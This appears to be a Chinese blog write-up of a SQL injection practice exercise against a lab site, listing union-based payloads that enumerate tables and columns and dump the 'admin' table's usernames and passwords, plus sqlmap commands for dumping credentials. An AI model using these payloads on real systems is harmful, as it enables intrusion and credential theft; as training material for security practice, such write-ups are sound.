SQL注入案例

目录

一、简介

二、案例

1.发现注入点

2.寻找注入类型

3.寻找字段数

4.将传参值设为超出数据量的大值,联合查询找到回显位置

5.找到数据库

6.寻找库中的表

7.寻找表中列

8.查看表中数据

附:SQLMap注入

1.输入指令查数据库

2.输入指令查表

3.脱库查看账号密码


一、简介

记录SQL注入的案例练习

二、案例

http://pu2lh35s.ia.aqlab.cn/

1.发现注入点

2.寻找注入类型

,发现?id=1 and 1=1 符合

3.寻找字段数

发现字段数为2

4.将传参值设为超出数据量的大值,联合查询找到回显位置

5.找到数据库

6.寻找库中的表

?id=111111 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

7.寻找表中列

?id=111111 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'--+

8.查看表中数据

?id=111111 union select 1,group_concat(username,':',password) from admin--+

注:用 --+ 对结尾进行注释

附:SQLMap注入(sqlmap -u "x")

1.输入指令查数据库( --dbs)

2.输入指令查表( -D xx --tables)

3.脱库查看账号密码( -D xx -T xxx -C xxxx --dump)

相关推荐
Dream_fly_iboy11 分钟前
系统架构设计师之数据库
数据库
风和先行29 分钟前
Android 数据库相关学习总结
android·数据库·学习
宠友信息38 分钟前
Spring Boot与异步审核构建仿小红书源码内容发布全流程
java·数据库·spring boot·redis·mysql·oracle·uni-app
小刘数字化1 小时前
告别爬塔危险:AR眼镜如何重构电力高空巡检安全标准
安全·重构·ar
txg6661 小时前
网络安全领域简报(2026年7月3日—10日)
安全·web安全·网络安全
2401_873479401 小时前
如何识别代理IP和伪装流量?用IP情报工具三步穿透住宅代理伪装
网络·数据库·网络协议·tcp/ip·ip
诚信定制8391 小时前
如何启动 Redis 服务:详细步骤指南
数据库·redis·缓存
AllData公司负责人1 小时前
数据同步平台|AIIData数据中台实现MySQL、Hive、Kafka 一键接入Doris
大数据·数据库·hive·mysql·kafka·实时同步
数据库小学妹1 小时前
MySQL安全加固全流程:网络隔离、TDE加密、数据脱敏、等保合规7步实战
mysql·安全·数据脱敏·审计日志·安全加固·等保合规
Edward111111111 小时前
一AI名词
java·开发语言·数据库·学习